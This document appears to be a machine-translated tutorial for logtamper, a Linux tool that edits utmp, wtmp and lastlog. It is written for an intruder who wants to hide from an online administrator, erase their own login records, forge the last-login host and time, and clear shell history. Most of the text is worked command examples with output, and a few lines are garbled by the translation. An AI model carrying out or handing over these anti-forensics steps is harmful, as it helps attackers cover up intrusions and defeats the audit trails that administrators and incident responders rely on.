Note that logtamper can only be used to clear log traces, and is mainly used for utmp, wtmp, and lastlog. In fact, the important logs of the linux system are: lastlog, utmp, wtmp, messages, syslog, and sulog. Therefore, you cannot rely solely on tools.
In addition, various shells also record the history of commands used by users. It uses files in the user's home directory to record the history of these commands.
The file name is. sh_history (ksh),. history (csh), or. bash_history (bash.
For. bash_history (bash), you can simply use histroy-c to clear records.
Logtamper version1.1
Logtamper is a tool for * modifying * linux logs. While modifying log files, logtamper can retain the time information of the modified files (atime is not changed and it is unnecessary ).
[root@localhost logtamper]# ./logtamper-staticLogtamper v 1.1 for linuxCopyright (C) 2008 by xi4oyulogtamper [-f utmp_filename] -h username hostname hide username connected from hostnamelogtamper [-f wtmp_filename] -w username hostname erase username from hostname in wtmp filelogtamper [-f lastlog_filename] -m username hostname ttyname YYYY[:MM[:DD[:hh[:mm[:ss]]]]] modify lastlog info
-F option: used to specify the path of the file to be modified. It is optional. Because the log storage paths of different systems are different, you can manually specify them.
The default log storage location is:
#define UTMPFILE “/var/run/utmp”#define WTMPFILE “/var/log/wtmp”#define LASTLOGFILE “/var/log/lastlog”
-H option: Sometimes you and the Administrator are online at the same time, and the Administrator will be able to see you at once. Use the-h option to avoid administrator w viewing, as shown below:
[root@localhost logtamper]# w21:27:25 up 5 days, 13:48, 4 users, load average: 0.00, 0.00, 0.00USER TTY FROM LOGIN@ IDLE JCPU PCPU WHATroot tty1 – Fri14 18:24m 0.33s 0.33s -bashroot pts/3 192.168.80.1 21:21 6:22 0.04s 0.04s -bashroot pts/2 192.168.80.1 21:06 0.00s 0.13s 0.00s wroot pts/4 192.168.80.1 21:21 5:52 0.03s 0.03s -bash
We are connected from the host 192.168.80.1, which is hidden below:
[root@localhost logtamper]# ./logtamper-static -h root 192.168.80.1Logtamper v 1.1 for linuxCopyright (C) 2008 by xi4oyuSeems you’re invisible Now…Check it out![root@localhost logtamper]# w21:27:46 up 5 days, 13:48, 1 user, load average: 0.00, 0.00, 0.00USER TTY FROM LOGIN@ IDLE JCPU PCPU WHATroot tty1 – Fri14 18:24m 0.33s 0.33s -bash[root@localhost logtamper]#
-W option: Used to clear your logon logs. Now the linux Log clearing tool is very dry. You can specify to clear machines with hostnames.
[Root @ localhost logtamper] # lastroot tty1 Wed Oct 1) root pts/4 192.168.80.1 Wed Oct 1 06:01:46 still logged inroot pts/3 192.168.80.1 Wed Oct 1 still logged inwtmp begins Wed Oct 1 2008 clear logon logs for 192.168.80.1: [root @ localhost logtamper] #. /logtamper-static-w root 192.168.80.1Logtamper v 1.1 for linuxCopyright (C) 2008 by xi4oyuAho, you are now invisible to last... Check it out! [Root @ localhost logtamper] # lastroot tty1 Wed Oct 1 06:01:46-() wtmp begins Wed Oct 1 2008 [root @ localhost logtamper] #
-M option: used to modify the last logon location. This may be noticed during ssh logon.
login as: rootSent username “root”root@192.168.80.128’s password:Last login: Wed Oct 1 21:31:40 2008 from 192.168.80.45[root@localhost ~]#
If you do not modify the lastlog, the Administrator will be prompted to log on from the IP address of our machine next time. You can use the-m option to edit this option:
[root@localhost logtamper]# ./logtamper-static -m root 1.2.3.4 tty10 2008:1:1:1:1:1Logtamper v 1.1 for linuxCopyright (C) 2008 by xi4oyuAho, now you never come here before…Check it out![root@localhost logtamper]#
Of course, this is just an example. In use, Please modify according to the specific information. The next time you log on as an administrator, the login interface will become
login as: rootSent username “root”root@192.168.80.128’s password:Last login: Tue Jan 1 01:01:01 2008 from 1.2.3.4[root@localhost ~]#